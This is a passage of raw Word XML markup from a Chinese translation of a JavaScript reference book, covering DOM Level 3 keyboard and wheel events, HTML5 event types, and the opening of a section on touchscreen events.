        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件对二维鼠标滚轮提供标准支持，通过</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件和传递新</w:t>
      </w:r>
      <w:r>
        <w:t>KeyboardEvent</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为参数给</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>eypress</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序来给文本输入事件提供更好的支持。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>wheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件的处理程序接收到的事件对象除了所有普通鼠标事件属性，还有</w:t>
      </w:r>
      <w:r>
        <w:t>deltaX</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>deltaY</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>deltaZ</w:t>
      </w:r>
      <w:r>
        <w:t>属性来报告三个不同的鼠标滚轴。大多数鼠标滚轮是一维或两维的，并不使用</w:t>
      </w:r>
      <w:r>
        <w:t>deltaZ</w:t>
      </w:r>
      <w:r>
        <w:t>。更多关于</w:t>
      </w:r>
      <w:r>
        <w:t>mousewheel</w:t>
      </w:r>
      <w:r>
        <w:t>事件的内容请参见</w:t>
      </w:r>
      <w:r>
        <w:t>17.6</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如上所述，</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>事件规范定义了</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，但不赞成使用它而使用称为</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>的新事件。传递给</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序的事件对象不再有难以使用的数字</w:t>
      </w:r>
      <w:r>
        <w:t>keyCode</w:t>
      </w:r>
      <w:r>
        <w:t>属性值，而有</w:t>
      </w:r>
      <w:r>
        <w:t>指定输入文本字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>textinput</w:t>
      </w:r>
      <w:r>
        <w:t>事件不是键盘特定事件，无</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>论通过键盘、剪切和粘贴、拖放等方式，每当发生文本输入时就会触发它。规范定义了事件对象的</w:t>
      </w:r>
      <w:r>
        <w:t>inputMethod</w:t>
      </w:r>
      <w:r>
        <w:t>属性和一组代表各种文本输入种类的常量（键盘、粘贴、拖放、手写和语音识别等）。在写本章时，</w:t>
      </w:r>
      <w:r>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Chrome</w:t>
      </w:r>
      <w:r>
        <w:t>使用混合大小写的</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>来支持这个事件版本，其事件对象有</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性但没有</w:t>
      </w:r>
      <w:r>
        <w:t>inputMethed</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t>17.8</w:t>
      </w:r>
      <w:r>
        <w:t>节包含使用</w:t>
      </w:r>
      <w:r>
        <w:t>textInput</w:t>
      </w:r>
      <w:r>
        <w:t>事件的示例。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>新</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>标准通过在事件对象中加入新的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>属性来简化</w:t>
      </w:r>
      <w:r>
        <w:t>keydown</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>keyup</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>keypress</w:t>
      </w:r>
      <w:r>
        <w:t>事件，这些属性都是字符串。对于产生可打印字符的键盘事件，</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>值将等于生成的文本。对于控制键，</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性将会是像标识键的</w:t>
      </w:r>
      <w:r>
        <w:t>"Enter"</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>"Delete"</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>"Left"</w:t>
      </w:r>
      <w:r>
        <w:t>这样的字符串，而</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>属性将是</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，或对于像</w:t>
      </w:r>
      <w:r>
        <w:t>Tab</w:t>
      </w:r>
      <w:r>
        <w:t>这样的控制键有一个字符编码，它将是按键产生的字符串。在写本章时，尚未有浏览器支持</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>属性，但如果</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>属性实现了，例</w:t>
      </w:r>
      <w:r>
        <w:t>17-8</w:t>
      </w:r>
      <w:r>
        <w:t>将使用它。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="427" w:name="17_1_3_HTML5Shi_Jian_"/>
      <w:r>
        <w:t>17.1.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>及相关标准定义了大量新的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>AP</w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t>（见第</w:t>
      </w:r>
      <w:r>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t>章），其中许多</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都定义了事件。本节列出并简要介绍这些</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用事件。其中一些事件现在已经可以开始使用，但更详细的信息在本书的其他地方，另外一些尚未得到广泛实现，也没有详细文档。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>广泛推广的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>特性之一是加入用于播放音频和视频的＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素。这些元素有长长的事件列表，它们触发各种关于网络事件、数据缓冲状况和播放状态的通知：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251695104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3437626" cy="677173"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="36" name="00036.jpeg" descr="000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00036.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3437626" cy="677173"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>传递给媒体事件处理程序的事件对象普通且没有特殊属性，</w:t>
      </w:r>
      <w:r>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:t>属性用于识别＜</w:t>
      </w:r>
      <w:r>
        <w:t>audio</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>video</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，然而这些元素有许多相关的属性和方法。</w:t>
      </w:r>
      <w:r>
        <w:t>21.2</w:t>
      </w:r>
      <w:r>
        <w:t>节有更多关于这些元素及其属性和事件的详细内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>允许</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>应用参与基于操作系统的拖放操作，实现</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>和原生应用间的数据传输。该</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义了如下</w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>个事件类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251696128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="2126411" cy="452886"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="37" name="00037.jpeg" descr="000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00037.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId40"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2126411" cy="452886"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>触发拖放事件的事件对象和通过鼠标事件发送的对象类似，其附加属性</w:t>
      </w:r>
      <w:r>
        <w:t>dataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>持有</w:t>
      </w:r>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:r>
        <w:t>对象，它包含关于传输的数据和其中可用的格式</w:t>
      </w:r>
      <w:r>
        <w:t>的信息。</w:t>
      </w:r>
      <w:r>
        <w:t>17.7</w:t>
      </w:r>
      <w:r>
        <w:t>节将对</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>拖放</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>进行说明和演示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>定义了历史管理机制（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.2</w:t>
      </w:r>
      <w:r>
        <w:t>节），它允许</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用同浏览器的返回和前进按钮交互。这个机制涉及的事件是</w:t>
      </w:r>
      <w:r>
        <w:t>hashchange</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>。这些事件是类似</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>unload</w:t>
      </w:r>
      <w:r>
        <w:t>的生命周期通知事件，它在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发而非任何单独的文档元素。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单定义了大量的新特性。除了标准化前面介绍的表单输入事件外，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>也定义了表单验证机制，包括当验证失败时在表单元素上会触发</w:t>
      </w:r>
      <w:r>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:t>事件。除</w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:t>外的浏览器厂商</w:t>
      </w:r>
      <w:r>
        <w:t>已经慢慢实现</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>的新表单特性和事件，但本书没有涵盖它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>包含了对离线</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用的支持（见</w:t>
      </w:r>
      <w:r>
        <w:t>20.4</w:t>
      </w:r>
      <w:r>
        <w:t>节），它们可以安装到本地应用缓存中，所以即使浏览器离线时它们依旧能运行，比如当移动设备不在网络范围内时。相关的两个最重要事件是</w:t>
      </w:r>
      <w:r>
        <w:t>offline</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>online</w:t>
      </w:r>
      <w:r>
        <w:t>，无论何时浏览器失去或得到网络连接都会在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发它们。标准还定义了大量其他事件来通知应用下载进度和应用缓存更新：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251697152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="3213339" cy="306237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="38" name="00038.jpeg" descr="000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00038.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3213339" cy="306237"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>很多新</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>都使用</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件进行异步通信。跨文档通信</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）允许一台服务器上的</w:t>
      </w:r>
      <w:r>
        <w:t>文档脚本能和另一台服务器上的文档脚本交换消息。其工作受限于同源策略（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）这一安全方式。发送的每一条消息都会在接收文档的</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>上触发</w:t>
      </w:r>
      <w:r>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件。传递给处理程序的事件对象包含</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>属性，它有保存信息内容以及用于识别消息发送者的</w:t>
      </w:r>
      <w:r>
        <w:t>source</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:t>策略。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:t>事件的使用方式与使用</w:t>
      </w:r>
      <w:r>
        <w:t>Web Worker</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>13.6.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）通信、通过</w:t>
      </w:r>
      <w:r>
        <w:t>Server-Sent</w:t>
      </w:r>
      <w:r>
        <w:t>事件（见</w:t>
      </w:r>
      <w:r>
        <w:t>18.3</w:t>
      </w:r>
      <w:r>
        <w:t>节）和</w:t>
      </w:r>
      <w:r>
        <w:t>WebSocket</w:t>
      </w:r>
      <w:r>
        <w:t>（见</w:t>
      </w:r>
      <w:r>
        <w:t>22.9</w:t>
      </w:r>
      <w:r>
        <w:t>节）进行网络通信相似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>及相关标准定义了一些不在窗口、文</w:t>
      </w:r>
      <w:r>
        <w:t>档和文档元素的对象上触发的事件。</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>规范第</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>版和</w:t>
      </w:r>
      <w:r>
        <w:t>File API</w:t>
      </w:r>
      <w:r>
        <w:t>规范都定义了一系列事件来跟踪异步</w:t>
      </w:r>
      <w:r>
        <w:t>I/O</w:t>
      </w:r>
      <w:r>
        <w:t>的进度。它们在</w:t>
      </w:r>
      <w:r>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>FileReader</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发事件。每次读取操作都是以</w:t>
      </w:r>
      <w:r>
        <w:t>loadstart</w:t>
      </w:r>
      <w:r>
        <w:t>事件开始，接着是</w:t>
      </w:r>
      <w:r>
        <w:t>progress</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件。此外，每个操作仅在最终</w:t>
      </w:r>
      <w:r>
        <w:t>loadend</w:t>
      </w:r>
      <w:r>
        <w:t>事件之前会有</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>abort</w:t>
      </w:r>
      <w:r>
        <w:t>事件。更多详细信息请参见</w:t>
      </w:r>
      <w:r>
        <w:t>18.1.4</w:t>
      </w:r>
      <w:r>
        <w:t>节和</w:t>
      </w:r>
      <w:r>
        <w:t>22.6.5</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后，</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>及相关标准定义了少量庞杂的事件类型。在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上发生的</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>存储（见</w:t>
      </w:r>
      <w:r>
        <w:t>20.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>定义了</w:t>
      </w:r>
      <w:r>
        <w:t>storage</w:t>
      </w:r>
      <w:r>
        <w:t>事件（在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上）用于通知存储数据的改变。</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>也标准化了最早由</w:t>
      </w:r>
      <w:r>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中引入的</w:t>
      </w:r>
      <w:r>
        <w:t>beforeprint</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>afterprint</w:t>
      </w:r>
      <w:r>
        <w:t>事件。顾名思义，当文档打印之前或之后立即在</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象上触发这些事件，它提供了打印文档时添加或删除类似日期或时间等内容的机会。（这些事件不应该用于处理打印文档的样式，因为</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>媒体类型更适合这个用途。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="428" w:name="17_1_4_Chu_Mo_Ping_He_Yi_Dong_She_Bei_Sh"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>17.1.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　触摸屏和移动设备事件</w:t>
      </w:r>
      <w:bookmarkEnd w:id="428"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>强大的移动设备的广泛采用（特别是使用触摸屏的那些设备）需要建立</w:t>
      </w:r>
      <w:r>
        <w:t>新的事件类别。在许多情况下，触摸屏事件映射到传统的事件类型（比如</w:t>
      </w:r>
      <w:r>
        <w:t>click</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>srcoll</w:t>
      </w:r>
      <w:r>
        <w:t>），但不是每次和触摸屏</w:t>
      </w:r>
      <w:r>
        <w:t>UI</w:t>
      </w:r>
      <w:r>
        <w:t>的交互都能仿效鼠标，也不是所有的触摸都可以当做鼠标事件处理。本节主要介绍运行在</w:t>
      </w:r>
      <w:r>
        <w:t>Apple</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
